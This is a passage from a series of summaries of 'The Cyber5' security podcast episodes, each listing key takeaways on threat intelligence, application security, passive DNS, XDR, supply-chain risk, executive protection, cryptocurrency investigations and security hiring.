is enforced for all transactions between the client and application ensures an extra layer of safety. Since modern applications are built on microservices, software developers should enforce encryption between all microservices. Data: It is increasingly important to ensure sensitive data is protected both at rest and while in motion and that the data can be traced from end-to-end. Monitoring: This means collecting telemetry or meta-data that gives you a panoramic view of an application, how it behaves and how its business logic is structured. 4) Improvements for Threat Intelligence Against APIs of Applications Threat intelligence providers need to go beyond the features of user stories, but also be able to alert and automate when malicious actors are targeting the microservices of APIs as the business logic of these APIs are more central to business operations. 5) Threat Intelligence Should Try to Integrate with Threat Hunting to Conduct Proper Malicious Pattern Matching, Reducing False Positives Pattern matching to detect malicious behavior over legitimate user traffic has evolved over time: Netflow: track network traffic emanating from the routers to the endpoints Applications: track application traffic to deter anomalies of authentication Data: track data flows in motion and at rest in the data lakes Devices: mapping devices to determine proper asset inventory Users: tracking user behavior such as off business hour queries to sensitive databases The industry still needs solutions that detect and correlate these behaviors at scale because thus far this has been extremely fragmented.
In episode 72 of The Cyber5, we are joined by DoorDash Application Security Manager, Patrick Mathieu. We talk about threat intelligence's role within applications security programs, particularly programs focusing on fraud. We discuss the importance of prioritization between what could happen, as often seen in penetration testing, and what is happening, as often seen with threat intelligence. We also talk about the different types of internal and external telemetry that can be used to drive a program and discuss the outcomes that are critical for an application security program to be successful. Three Key Takeaways: 1) Application Security Overlaps and Threat Intelligence Shortcomings Fraud programs exist to save money and application security programs exist to discover and mitigate cyber vulnerabilities. However, most of the same problems are derived from the same weaknesses in the application architecture during the software development lifecycle (SDLC). Any application development team needs to know the following: Attacks: Understand the threat, who is attacking, and what they are attacking. The threat could be the server, the client, the user, etc. Custom Angles: A fraudster is always going to attack the business logic of an application, the custom rules or algorithms that handle the exchange of information between a database and user interface. Obscurity: The threat will not likely be in the news, such as a ransomware group. As a technology company grows, an application will gain interest from fraudsters who will try to abuse the application. Threat intelligence falls short in collecting against these actors because it's so specific to business logic and not an organized crime group with greater notoriety or known tactics, techniques and procedures (TTPs). 2) Common Vulnerabilities in Application Security Pertinent to Fraud While injection attacks are still common, the most common application vulnerabilities are fraudulent authentication attempts and session hijacking. Microservices (token sessions, for example) are common in applications. However, it's very challenging to know who is doing what in the application - for example, knowing whether it's a consumer, an application developer, or fraudsters. Many companies do not have an active inventory of asset management, particularly with their applications. There is little visibility for analyzing the logs on the Web Application Firewall (WAF). Every application is different and understanding what is normal versus fraudulent takes time and modeling to focus on who is attacking business logic for fraudulent gains. 3) Application and Security Engineers Must Communicate Security champion programs are critical to getting application and security engineers to communicate in a way that articulates what is normal in an application. If this collaboration does not work, the attackers will be able to collaborate quicker to execute. Adoption rates of application engineers are a better metric to monitor versus showing remediation of vulnerabilities.
In episode 71 of The Cyber5, guest Nisos moderator and teammate Matt Brown is joined by security practitioner Matt Nelson. They talk about a recent intelligence blog Matt Nelson wrote about how to operationalize intelligence for the SOC and some outcomes that an incident response team looks for from intelligence. They also talk about how to make intelligence more broadly used for investigations and discuss the intelligence market more holistically. Three Key Takeaways: 1) Threat Intelligence Augments Threat Hunting in the Security Operations Center (SOC) Intelligence requirements are critical throughout the business and not just limited to the SOC. Threat intelligence can be a significant help to the threat hunting and detection team. The outcomes that threat hunting teams generally look for are: Cyber Kill Chain: Analyzing payload, including commands it's running, attack hosting infrastructure, what ports is the infrastructure using to communicate, etc. Target Verification: Identifying who and how they are being targeted and for what intent is often missing context when just looking solely at forensics data. Collection Intent of Attacker: Trying to determine what kinds of data the attackers are aiming for. This is hard to determine simply from forensics data. Target of Opportunity Versus Targeted Attack: Determining if attacks are targeting the many or the select few is critical for defense strategies. If targeting efforts are directed solely at IT personnel with admin access, that's more significant than a “spray and pray” campaign. Outcomes: Outlining detections, protection strategies, and awareness campaigns. 2) Evolving Threat Intelligence Beyond the SOC Threat intelligence is not just cyber news or indicators of a compromise (IoC) feed. Threat intelligence is useful for insider threat, fraud, platform abuse, corporate intelligence, and supply chain risk. 3) Single Data Aggregators for Enterprises (SIEMs, TIPs, MISP) Aren't the Panacea The SIEM is not the greatest place for threat intelligence data because there are too many internal logs that aren't relevant. The TIPs are mostly focused externally and good for IOCs and correlating threat intelligence that's not useful. It's simply repeating what is already known. MISP (https://www.misp-project.org/) is open source but can be effective with the right resources. Data modeling and getting the right taxonomy of the data is the most critical.
In episode 70 of The Cyber5, we are joined by Open Source Context Director of Operations, Donald McCarthy. We discuss external telemetry available to the private sector, focusing on passive domain name systems or passive DNS, and Border Gateway Protocol or BGP. These data sets are critical for threat intelligence teams, as they often provide crucial information on attacker infrastructure for the SOC. Still, they also help solve problems and provide context on a much broader scale. Three Key Takeaways: 1) What is Passive DNS and how is it collected? To simplify, passive DNS is a way of storing DNS resolution data so that security teams can reference past DNS record values to uncover potential security incidents or discover malicious infrastructures. Passive DNS is the historical phone book of the internet. Practitioners can collect it by: Collecting on the resolver: Have access and enable logging on the resolver, often termed “T-ing the Resolver.” The client-side of the DNS is called a DNS resolver. A resolver is responsible for initiating and sequencing the queries that ultimately leads to a full resolution (translation) of the resource sought, e.g., translation of a domain name into an IP address. DNS resolvers classify data using various query methods, such as recursive, non-recursive, and iterative. Listening on the wire: DNS is port 53 UDP unencrypted, and many security teams put a sensor like Bro, Onion, Snort, or Suricata that can collect and then parse the data. 2) What is Border Gateway Protocol (BGP)? BGP is designed to exchange routing and reachability information between autonomous systems on the Internet and is often complementary to passive DNS. If PDNS is the historical phone book of the internet, Border Gateway Protocol (BGP) is the postal service of the Internet. BGP is the protocol that makes the Internet work by enabling data routing. For example, when a user in Thailand loads a website with origin servers in Brazil, BGP is the protocol that allows that communication to happen quickly and efficiently, usually through autonomous systems (ASes). ASes typically belong to Internet service providers (ISPs) or other large organizations, such as tech companies, universities, government agencies, and scientific institutions. Much of this information can be commercially collected and available. 3) Use Cases for PDNS and BGP in the SOC: Identifying attacker or botnet infrastructure. Identifying all internet-facing infrastructure in business use. Identifying tactics, techniques, and procedures of attackers. 4) Use Cases for PDNS and BGP outside of the SOC: Verify internet-facing applications and infrastructure for merger, acquisition, and compromise items for M&A. Verify internet-facing applications, infrastructure, and compromise for suppliers. Review staging infrastructure of competitors to scan product launches. Investigate threatening emails to executives. Investigate disinformation websites and infrastructure. 5) Enrichment is King and Does Not Need to Be Resource Intensive If security teams are not engaging with the business to solve problems that risk revenue generation, data sets like PDNS or BGP do not matter. For example, if an organization does not control DNS at their borders, they will lose a lot of visibility to reduce risk and potentially give away proprietary information.
In episode 69 of The Cyber5, we are joined by Lima Charlie's CEO, Maxime Lamothe-Brassard. We discuss the future of what's known in the security industry as XDR, which is essentially an enrichment of endpoint detection response products. Three Key Takeaways: 1) What is XDR? Depends who you ask. XDR is not another tool, but merely an extension of Endpoint Detection and Response (EDR) products. Gartner expects 50% of mid-market buyers to adopt XDR strategies by 2027. For context, in around 2010, cybersecurity vendors started driving stronger antivirus solutions for endpoint computers and servers, called Endpoint Detection and Response (EDR). The antivirus was only catching malware with a known signature and not able to detect more malicious lateral movements that are common in today's attacks. Every EDR platform has its own unique set of capabilities. However, some common capabilities include the monitoring of endpoints in both online and offline mode, responding to threats in real-time, increasing visibility and transparency of user data, detecting stored events with malicious malware injections, and creating blacklists and white lists in integration with other technologies. Now that EDR solutions are firmly within the market, they need to be integrated with other tools, including threat intelligence, to be effective at scale for the enterprise. These massive integrations needed at scale, especially with the cloud, are what is starting to be defined as XDR. 2) What are the key integrations to EDR products to form an XDR strategy? a. Identity Access Management: Gives visibility to who is accessing what applications and websites in the enterprise. b. Threat Intelligence: Information and artifacts from attacker infrastructure, previous compromises, and behavior that can be identified outside of firewalls. c. Cloud and SaaS Logging: Any application in the cloud produces a log for access and use. 3) XDR does not have to be expensive or manpower-intensive for SMB. a. Cloud, SaaS, and Identity Access Management produce logs that can be integrated into easy solutions that do not need to be complex products, particularly for SMB. b. Enablement should be the critical aspect of XDR rather than more expensive tooling. c. Easy, automatable solutions to apply security controls are the critical way forward for medium and large enterprises.
In episode 68 of The Cyber5, we are joined by Executive Director and Head of Global Threat Intelligence for Morgan Stanley, Valentina Soria. We discuss leading a large-scale threat intelligence program in the financial institution space and how to make intelligence absorbable by multiple consumers. We also talk about how intelligence teams can build processes and technology at scale to increase investment costs to criminals. Finally, we touch on large enterprises being a value-add to small and medium-sized businesses. Two Key Takeaways: 1) Intelligence is Valued Differently By Different Stakeholders Tactical, operational, and strategic intelligence gains can fill many gaps in business, inside and outside the security operations function. Good intelligence analysis should make business stakeholders rethink their assumptions about risk and address realities regarding specific scenarios around the state of the organization's risk posture. 2) Begin with the SOC, then Spread Across All Business Sectors Cyber threat intelligence is a journey and it takes time to realize a return on investment. Find coverage gaps that complement existing controls that have current metrics leveraged against them and leverage them. User Metrics to help, such as: For SOC/CIRT Teams: The number of incidents and issues remediated, quantity of vulnerabilities patched, and most importantly, enumerate or outline the loss that could have occurred from those exploited vulnerabilities. For Outside the SOC: Inform the business of any type of risk through tactical, strategic, and operational intelligence.
Topic: Value of Securing Containers in the Technology Supply Chain In episode 67 of The Cyber5, we are joined by senior security practitioner Julie Tsai. We discuss security and intelligence in modern-day technology platforms, concentrating on how to secure the impact that container and cloud environments have on the technology supply chain. Compliance and intelligence play a critical role in the application and development of supply chain risk. Specifically, when developers perform code commits and updates, we discuss the criticality of intelligence and compliance to ensure code is truthful, accurate, and complete. Three Key Takeaways: 1) Containers and Virtualization Images Offer Repeatability But Also Potential for Compromise at Scale Containers give software developers the potential to establish an assembly line of repeatable, secure patterns because they are operating system agnostic. However, the upstream effort to harden the container and set the right images or configurations needs to be correct from the beginning. Simultaneously, mistakes can lead to a compromised container or host OS level that might impact the container. Container configurations have a shared kernel with modular application containers and services on top. Therefore, security practitioners must be mindful of anything that can break out of that container. Furthermore, if there is a host OS-level hardening, they must ensure kernel-level memory doesn't compromise and impact all the dependent layers. 2) Supply Chain Risk with Containers Supply chain risk in technology is challenging because developers generally borrow code from other developers, and they don't check libraries and dependencies for security issues. In addition, contractual agreements aren't capturing all the supply chain pipeline nuances. It's hard enough to know what's happening inside an enterprise network, let alone understand the provenance and the chain of custody. Security issues can get injected into the end product when not following a strict process concerning container changes. “Defense in Depth” is a classic security principle that matters in securing containers such as application and configuration management. In addition, other aspects like source control, commit trail, and fingerprinting different kinds of artifacts are all checksums to ensure the correct update of code. 3) Threat Intelligence Fundamentals with Container Security A threat intelligence program needs to start by aligning with the business with the most prevalent threats. A banking site will have different threats than e-commerce, gaming, or crypt-currency exchange. Therefore, a threat intelligence program needs to be modular enough to scale to many types of threats as the business grows. More tactically related to containers, developers can't be tearing down containers as little work would get done if a malicious actor scans a container environment. However, if a threat intelligence team notices a regularity or repeatability with the scan attempts followed by authentication attempts to the environment, those types of intelligence alerts are fruitful. Intelligence programs show clear value on highly attacked industries (manufacturing, health care, retail, finance). The challenge is if you put blinders on and think there isn't a way to be attacked other than regular threat intelligence blogs.
In episode 66 of The Cyber5, we are joined by H&R Block Chief Information Security Officer (CISO) Josh Brown. In this episode we discuss the importance in building an informed security team that can collect intelligence and proper risk strategy. We have a frank conversation about what the business of security means and how to develop a team that understands multiple business lines so a security team is anchoring their security strategy to how the company is driving revenue. We talk through how to do this at scale within the intelligence discipline that touches many lines of risk, not just cybersecurity. Three Key Takeaways: 1) Security Informs the Business to Make Risk-Based Decisions Security professionals must have a deep understanding of how the business functions to understand how to develop a proper risk-based approach. Security is a risk management function that puts up guardrails so the business avoids bad decisions and loses money. Intelligence is critical for gaining a 360-degree review: fraud and user segment of the network. Threat intelligence must be relevant to the specific business, not the industry overall. If there is a threat to a bank, that likely has nothing to do with a tax filing service. 2) Actionable Intelligence That Reduces Business Risk The industry has not secured an intelligence solution. Intelligence is an enrichment function, not the first line of the truth of what to prioritize. Fraud and other specific business-specific data that result in business loss are equally important to be funneled into traditional cybersecurity tools. Further, threat feeds and information must be bi-directional so even competitors and businesses in the same location can understand when incidents are taking place. The threats that most companies face are not those that are regularly marketed such as Advanced Persistent Threats. The cybersecurity industry does a poor job at providing the likelihood of a certain advanced attack. Business email compromises, account takeovers, and fraud are still the most prevalent style attacks, even to those businesses that can afford sophisticated security technology. 3) Actionable Intelligence That Gives Visibility into Supply Chain Risk “The perimeter” is no longer relevant like it used to be. With work from home, the perimeter is just as much identity access management (IAM) as it is about IP space. On third-party supply chain risk, currently, enterprises implement score card tooling as an audit function so when a software vulnerability is released, an enterprise can quickly query what suppliers use that library or dependency. Further, the supply chain is equally about business interruption (DDoS) as much as it is about suppliers that hold critical data. Major enterprises also care about the vendor's vendors if compromised depending on the criticality of the data (fourth-party supply chain risk). Since the United States does not even have a standard breach notification law, it's going to be very challenging to share intelligence bi-directionally let alone get developers to uniformly submit secure technology code.
In episode 65 of The Cyber5, we are joined by Jon Iadonisi, CEO and Co-Founder of VizSense. Many people think of open-source intelligence (OSINT) as identifying and mitigating threats for the security team. In this episode, we explore how OSINT is used to drive revenue. We talk about the role social media and OSINT play in marketing campaigns, particularly around brand awareness, brand reputation, go-to-market (GTM) strategy, and overall revenue generation. We also discuss what marketing and security teams can learn from OSINT intelligence tradecraft, particularly when there are threats to the brand's reputation. Four Key Takeaways: 1) Even in Marketing, Context and Insights Provide Intelligence, Not Data Raw data is not intelligence; rather, intelligence is a refined product where context is provided around information and data. Similar to the national security and enterprise security world, where adversaries are trying to commit crimes and espionage, businesses want to attract people to their brand. Open-source and social media information are powerful data points when analyzed, providing critical intelligence on what consumers and businesses want to buy. Every human being is now a signal no different from radio intercepts during Pearl Harbor. 2) The Role of OSINT in Driving Revenue for the Brand; Quantitative and Qualitative Metrics In the security world, attribution to a particular organization is necessary to continue to receive fundraising, whether it's a hacking group or a terrorist organization. In the marketing world, brand intelligence is a crucial piece in the following three elements to influence a person: Persuasive content Delivered from a credible voice Network or audience with a high engagement rate Open-source intelligence can be mined in a way that provides insights stronger than traditional marketing focus groups. While celebrities attract attention, people are likely to follow people like themselves, aka micro-influencers. Quantitatively, numbers increasing in revenue, sharing, engagements are critical metrics. Qualitatively, marketing teams can mine social media data to determine what people are thinking about a particular product, but also to understand how the products are performing, and then design and build future products. The crowd will tell a brand what they want and they don't have yet, and you can use that data to build future products. 3) Where Marketing Meets Security: Threats to Brand Reputation Security teams should work with marketing teams daily to protect the brand. In today's threats to brands, the human dimension of what people say online is of equal credibility if not more important than technical signals that show a company has suffered a breach, particularly regarding misinformation and disinformation. The human dimension is converging with a technical dimension, and a true holistic hybrid model is needed for enterprise security and intelligence teams. An example of reputation threats that happen in business every day: Smear campaigns using disinformation and misinformation from competitors introduce uncertainty into a brand's ecosystem. 4) Where Security Meets Marketing: Privacy Taken Seriously That Enhances the Brand On the flip side, marketing teams should look for ways to promote the security of their products as business differentiators. Marketing teams should also consult with the security teams to understand all the different data lakes that are available in social media, dark web, and open source to ensure they can collect on the proper type of sentiment where brands are being discussed.
In episode 64 of The Cyber5, we are again joined by John Marshall, Senior Intelligence Analyst at Okta. We discuss building a threat intelligence program to protect executives, particularly on nuances of being a “solution-side security company”. We discuss a risk-based approach for protecting executives and the data that's important to aggregate and analyze. We also talk about success metrics for intelligence analysis when building an executive protection program. Three Key Takeaways: Plans, Actions, and Milestones Regardless of industry, connecting with your executive team on a personal level to establish trust is the first step in any executive protection program. Communicating plans, actions, and milestones are critical. Within these three segments, intelligence requirements should be tiered into 3 groups - strategic, operational, and tactical. Strategic: Security of the people, security of places, and security of the brand Operational: Methodologies and means a security team is going to use to monitor for threats to the brand. Specifically, collecting intel on current events, private investigation, travel tracking for executives, and company-wide messaging system to track employees Tactical: Day-to-day implementation of integrating the strategic and operational methodologies 2) Distinguishing Between Targets of Opportunity and Targets of Attack Typical items to review when protecting executives: Weather that's going to impede movement Social media activity that reveals plans for protests or riots near a location of interest Natural disasters Geo-political events The primary mechanisms to protect against targets of opportunity: Background checks Social media monitoring, includes OSINT monitoring and analysis When mechanisms to flesh out targets of opportunity appear to escalate, where they become a target of the attack, often private sector security teams lack an action arm to dispel that threat and have to rely on law enforcement for investigations. Intelligence analysis and determination of facts should be pursued on any threat so that security teams can effectively request law enforcement intervention - equipped with more information that will allow faster response. 3) Articulating Success Metrics Pinpointing the right event is the most critical of success criteria. Executing the intelligence cycle of planning, collecting, exploiting, analyzing, and disseminating information that an executive can use to answer a “so what?” is still a nuanced concept for many private sector organizations. Documenting “wins” and “losses” are equally critical. Security is a risk management function that exists to keep the workforce safe and doing their jobs. Whether it's getting an executive out of a traffic jam or informing a team of a hurricane happening during a conference that mitigates injury, these should be documented for value-based metrics.
In episode 63 of The Cyber5, we are again joined by Sean O'Connor, Head of Global Cyber Threat Intelligence for Equinix. We discuss attribution in the cyber threat intelligence and investigation space, and what the private sector can learn from public sector intelligence programs. We also discuss different levels of attribution, the outcomes, and the disruption campaigns that are needed to make an impact on cybercriminals around the world. We define the impact of attribution with different stakeholders throughout the business and how the intelligence discipline will likely evolve over the next five to 10 years. Five Key Takeaways: Lessons For Private Sector Intelligence Teams from Public Sector National Security Apparatus (Intelligence Life Cycle, MITRE ATT&CK, Cyber Kill Chain) Many cybersecurity best practices and frameworks originate from the US public sector: Intelligence life cycle: Defining priorities and communicating intelligence to stakeholders Lockheed Martin Cyber Kill Chain: Defining broad malicious actions in IT networks MITRE ATT&CK Framework: Identifying more specific malicious movements in IT networks Structured analytical techniques by CIA analysts, such as Richard Kerr. 2) Attribution is Critical in Cybersecurity to Warrant an Action Attribution to cyber threat actors by industry is still important as a starting point to derive appropriate controls for the SOC and the CERT within a large organization. How these threats pose a risk of monetary loss are important elements of context when providing these threats to business executives. Here are two typical starting points: Review phishing telemetry for common TTPs and create rule-based detections based on phishing infrastructure used by actors. External threat landscape assessment for TTPs resulting in targeted threat hunts for most notorious ransomware gangs. Creating custom detections is typically the outcome until the appropriate disruptions can be put in place. 3) Disruption Campaigns Happen with Successful Information Sharing Successful disruption campaigns come from non-public information sharing between vendors, enterprises, and public sector institutions like CISA or the FBI. They typically do not originate from marketing blog posts. 4) Threat Intelligence is a Service-Based Role that Goes Beyond the SOC Success in cybersecurity (SOC and CERT) is keeping security incidents limited to “events” and ensuring they do not escalate into breaches. This occurs from multiple stakeholders having the proper visibility to ensure network telemetry is complete, accurate, and truthful. However, due to the services nature of intelligence work, it goes beyond just the SOC. 5) Threat Intelligence Should be a Floating Team to the Business Threat intelligence should be a floating team that can operate outside of the SOC and is an asset to the overall business, not just limited to combating cyber threats. Often executives want intelligence on mergers and acquisitions and market entry in a given geopolitical area, and threat analysis needs to be tailored to different customers. A Chief Intelligence Officer may be more widely accepted in the future as the needs of the business expand and diversify.
In episode 62 of The Cyber5, we are again joined by Charles Finfrock, CEO and Founder of Black Hand Solutions. Charles was previously the Senior Manager of Insider Threat and Investigations at Tesla and prior to that, he worked as an Operations Officer for the Central Intelligence Agency. We discuss the generalities of cryptocurrency and go into the tactics, techniques, and procedures for conducting cryptocurrency investigations. We also discuss some case studies and what proper outcomes look like for making it more expensive for the adversaries to conduct their operations in this generally unregulated world. Three Key Takeaways: Generalities, Functionalities, and Value of Bitcoin and Cryptocurrency In its simplest form, Cryptocurrency is digital coins or money (Bitcoin and Ethereum being the most popular). It is not run or governed by a central authority, but by a mathematical algorithm that verifies the transactions, controls the supply of the certain coin, and runs on the blockchain. Blockchain, as it pertains to Cryptocurrency, is a ledger that verifies what has been sent and received from an account. It is pseudo-anonymous, it is not anonymous - which is why criminals have been leveraging it so aggressively. When Bitcoin is transacted, the amount sent and received are recorded on the Bitcoin ledger (Blockchain) and associated with a Cryptocurrency wallet address. Criminals think they can hide their identities as a result of not needing a formally validated identity through a central authority. Since Cryptocurrency is not controlled by a central government no one can modify the supply of the particular cryptocurrency. It derives value in the same way the US dollar used to derive value from gold - scarcity. The argument for Bitcoin's value is similar to that of gold—a commodity that shares characteristics with the Cryptocurrency. The cryptocurrency is limited to a quantity of 21 million. Bitcoin's value is a function of this scarcity. 2) Conducting Cryptocurrency Investigations - Decreasing Return on Investment to Criminals When criminals first started using Cryptocurrency in 2012 it was because they thought they could hide their identity. At the time, tools were not available to law enforcement to unmask and attribute actions to persons. That has changed. The two kinds of investigations that clients engage in are reactive and proactive. Reactive are when scams have already been perpetrated against their brand. Proactive are when security teams engage with actors to derive the scam before a significant amount of loss occurs. Legal and technical methods can be deployed to “burn down the infrastructure” to decrease the return on investment for online criminals. Oftentimes an outcome can be to contact a centralized bank or Cryptocurrency exchange (i.e. Coinbase) that is linked to the Cryptocurrency as a means to “cash out” the criminal proceeds, report the fraud, and disrupt the activity, thus increasing the costs to the criminals. 3) Provenance and Repudiation To Understand Truth, Accuracy, and Completeness As with any online crime investigation, investigative techniques identify stylometric attributes of the criminal infrastructure that reveal the provenance of data by the malicious actor. The end provides authorities the ability to repudiate this scheme in the future. Often what we look for are lapses in operational security by the threat actors, which include but are not limited to the following: An actor registered a domain and failed to enable private registration before correcting their mistake. An actor forgot to use their VPN or proxy to connect to their C2 infrastructure and revealed their source IP range. An actor reused certificates on different infrastructure or failed to properly encrypt their C2 traffic. Going a step further, we pivot from technical analysis to open source intelligence (OSINT) to add valuable context to the nature of the threat an organization faces. By exposing network infrastructure and drawing associations using threat information and other technology-enabled OSINT connections, we can determine the motivation and sophistication of the threat. We assess characteristics such as: Content, stylometric attributes, and similarities between criminal persona accounts and true-name accounts. Re-use of content in a spearphish that was similar to content existing elsewhere, such as blog or social media posts. Re-use of usernames or email addresses to register a malicious domain or subscribe to a third-party file server or virtual private server. Photographs that provide traceable location details such as landmarks or geographical attributes. Screenshots, files, or photos used by the actor that leave vital forensic clues revealing real identity or location. Details ascertained through direct engagement with the threat actor.
In episode 61 of The Cyber5, we are joined by Josh Shaul, CEO of Allure Security. We discuss cybersecurity and account takeovers. We focus on the lifecycle of an account takeover , how to permanently solve it, and how to show a clear return on investment to small business owners. We also talk about how to impede attackers by making their efforts more costly and difficult. Four Key Takeaways: 1) Account Takeovers An account takeover is a form of identity theft and fraud, where a malicious third party successfully gains access to a user's account credentials. Previously targeted at large enterprises, these attacks are now targeting SMBs. 2) Disrupting the Return on Investment Against an Attacker By Automating defenses and rapidly removing fake websites, attackers are faced with increased cost and less success. 3) Too Much marketing Focus on APTs A lot of cybersecurity products and technology focus on advanced persistent threats (APTs) and ignore the threats that matter. Organizations can best protect themselves by mapping technology to the threats that are actually targeting them. 4) Intelligence Must be Actionable Making intelligence actionable is necessary for proper security regardless of an organization's size. For many organizations, this is most easily achieved through managed services providers that provide people, process, and technology that is otherwise not attainable for small enterprises.
In episode 60 of The Cyber5, we are joined by Tom Thorley, the Director of Technology at the Global Internet Forum to Counter Terrorism (GIF-CT). We discuss the mission of GIF-CT and how it's evolved over the last five years, with particular interest on violent terrorist messaging across different social media platforms. We also discuss the technical approaches to countering terrorism between platforms and how their organization accounts for human rights while conducting their mission. Four Key Takeaways: 1) The Evolving Mission of GIF-CT GIF-CT combats terrorist messaging on digital platforms and is particularly focused on removing live streaming of violence. They were founded in 2017 by Microsoft, Facebook, YouTube, and Twitter to mostly combat advanced ISIS messaging efforts across their platforms, particularly after several high profile terrorist attacks were live streamed. GIF-CT has grown to include 17 different technology companies that participate in the mission of combating terrorist exploitation of their platforms. Since ISIS has been degraded over the last three years, GIF-CT has expanded their mission to include supporting the United Nations Security Council's Consolidated Sanctions List. 2) Behavioral Models as Opposed to Group Affiliation Due to the fast adaptation and evolution of terrorism, GIF-CT has moved to track behavioral models of violence rather than attempt to focus on known terrorist groups. They built out an incident response framework to review emergency crisis situations using technology called “hash sharing.” Now, they are looking at expanding into: Manifestations of terrorist attacks just carried out Terrorist publications (Inspire Magazine by al-Qaeda) with specific branding URLs, videos, and images where specific terrorist content exists across platforms 3) Hash Sharing Across Social Media Platforms with Content User created content is not associated with an identifiable individual, like an IP address generally tied to a device. When GIF-CT hashes videos, they not only use traditional MD5 hashes, but also use perceptual hashes, which are locality sensitive. These hashing techniques and different algorithms provided by the technology companies, allow images, videos, and URLs to be flagged and potentially removed from the platform in close to real time. There is some new hash sharing technology that is being explored around PDFs. The need has been driven in part because malware is exploited because the backend code of the PDF is manipulated whereas terrorist manifestos are not, they are just content. Technology is being explored by GIF-CT where they can hash certain content strings in PDFs for alert. 4) Optimizing for Human Rights GIF-CT hashing algorithms minimizes impact to human rights during emergency situations and differentiates between legitimate journalism and normal discord between people on the platform. GIF-CT goes through tremendous transparency initiatives that focus their algorithms on violence extremism.
In episode 59 of The Cyber5, we are joined by active security compliance practitioner, Dylan McKnight. We discuss the business of security. We unpacked how security can be effective at driving profitability and not just be a cost center toward an organization. We discuss how compliance measures can drive meaningful metrics around profitability and avoiding breaches. And finally, we talk about where threat intelligence provides the proper risk-based approach for security teams in this process. Five Key Takeaways: 1) Making “Security” Be Seen as More than Just a “Cost Center” Prioritize external-facing business leaders and help them to become security stakeholders. Give Sales, Customer Success, and Marketing a reason to care about security. In the technology space it's important to understand how your organization makes money. You must embed security practices into the contracts to ensure your organization is being a good steward of each department's data. Third party risk management processes are an example of how this shows up in the everyday. In the pre-close world, work with the sales team to ensure security functions are assisting to close deals faster. As a communicator, you must also improve customer relationships through privacy programs and a good incident notification policy after the sale. You must still maintain key relationships with necessary internal stakeholders such as: Internal auditors who will answer to regulators (SOC2, ISO Cert, etc) Engineering team with product development cycle Legal and HR 2) Security Roadmap is Critical with Limited Resources It's critical for security practitioners to understand that the vortex of power within technology teams is centered around sales and product engineering teams. Security practitioners lament that they don't get enough time in front of internal decision makers, that's why they need to embed themselves in the sales cycle. Critical security functions like identity and access management (IAM) and file integrity monitoring are two examples of having value, but are time intensive and don't necessarily improve the bottom line unless they are part of customer contracts. However, privacy requirements are becoming critical to engineering and sales teams and a security program should be adapted to meet those needs first. 3) Developing the GTM-focused Security Playbooks that Scale with the Business Growth Risk assessments for what could cause the most business loss are important to start, backed by standards and controls that align to this potential loss. “Move fast and break things” could have monetary losses in security, so it's important to go to quarterly business reviews with the sales team and understand the pain points in the sales process. Security should exist to make sales move through the process quicker and then by illuminating potential risk. 4) Compliance is Important for Maintaining Customers It's cheaper to keep existing customers than gain new customers. To keep existing customers, trust becomes a critical aspect. Transparency around security controls and incident notification with your customers can go a long way to keeping them satisfied during renewals. Compliance standards that meet these transparency requirements are beneficial for building trust with customers including the right levels of monitoring of cloud infrastructure and managed detection and response. It's important to understand how all the different teams use data in the environment and protect what really matters, which in technology companies is usually the “least privilege” permissions around the production environment. 5) The Role of Threat Intelligence in Risk Assessments Risk-based approaches are always a good starting point. Threat intelligence should be geared to focusing on who, how, and why threat actors are actually attacking your organization. Simple defenses should be built around threats that are happening, not just what is possible. Not only monitoring the dark and open web, but closely analyzing your firewall logs and providing an “outside-in” inspection to closely enrich data your internal telemetry with external signals for more risk-based context and prioritization.
In episode 58 of The Cyber5, we are joined by Magen Gicinto, Director People Strategy and Culture for Nisos. We discuss the “Great Resignation'” that's happening in the work environment during the COVID pandemic and how to realign your “people strategy” to recruit and retain the best talent in spite of those challenges. We address the aspects of recruiting and retaining the best talent and how to calibrate total rewards in consideration of employees' ever-changing motivations. Finally, we cover the nature of startup culture in the technology sector and the convergence of generalists and specialists in high performance organizations. Four Key Takeaways: 1) Recruiting and Retaining Talent During the COVID-19 Pandemic Employees who would have otherwise left their jobs decided to stay put during the pandemic. Now, even though we are still in the throes, people feel safe again to move jobs, which is leading to an unprecedented turnover in the global workforce. In fact, according to statistics published by the U.S. Department of Labor, voluntary turnover dipped significantly in 2020, but in early 2021, it jumped higher than ever before, with 4 million people leaving jobs in April 2021 alone in the U.S. Employees that are looking for new opportunities and want to integrate work/life responsibilities are looking for employers who support those values. What remains is employees continue to want opportunities for career advancement and building their skill sets. One core solution for employers is to reimagine the employee experience so you can keep your best people and recruit great talent. Understanding what your employees value and what motivates them is key to reducing churn and attracting new people. High performing People Strategy departments are adept at creating employee engagement, from onboarding through the employee lifecycle, that help to continue to satisfy employee motivations throughout their tenure with an organization. 2) Experiential Support to Employees Is Critical Organizations that invest heavily in creating the best employee experience will have better success at recruitment and retention. Organizations and teams are most successful when the organization's strategies, structure, and culture are aligned. During the infancy stage of startups, there is little consistency for people to hang on to. Leaders are focused on doing what they can to source and hire the best talent, while outsourcing other services. Once you move past the infancy stage and start growing, your attention needs to move to ensuring stability and creating a life cycle for employees. Employees who are embedded into the organization from day one who have experience with a strong onboarding regimen will have more staying power and satisfaction with the organization. While white-glove on-boarding is not always achievable at a startup level (based on lean staffing), companies that can find the resources to do so win it back with stronger employee integration in the entity from day one. 3) Challenge Playbooks to Create the Best Employee Experience Here are some ways to create an environment where employees can succeed and grow within an organization. This is especially crucial within cybersecurity where the table stakes can be higher, and the goal posts can move quicker. Set clear goals Be consistent in performance management Understand what obstacles are in the way of them performing at their best so you can help remove barriers to them being successful Keep the lines of communication open Have honest, fact-based conversations so that when they have concerns about their job or their performance, you're prepared to address things with perspective. 4) Prevent Silos and Bring People Together When New Departments are Created When recruiting, look for talent who create value and can deliver on company objectives. Employees want to have purpose in their work and know that they're making a difference. As a startup organization, you have a great opportunity to create and influence organizational decisions and add value. Hire individuals who are up for the challenge and want to lean into the company's goals with the team. To avoid departmental silos, it's important to: Attract and help select the best talent that meets the business' needs Close any skills gaps Recruit people who value differences in perspectives Look for ways to create new and better ways for the organization to be successful Hire people who are likely to drive results and tackle new challenges using both success and failure as learning opportunities By bringing different departments into the recruitment and retention process, it helps avoid silo-type organizations. It creates more alignment, and helps employees understand what's going on in the business. Once a new hire comes on, all of the departments are similarly invested in the individual, and can incorporate them, which will allow them and you to begin to utilize their skillsets effectively.
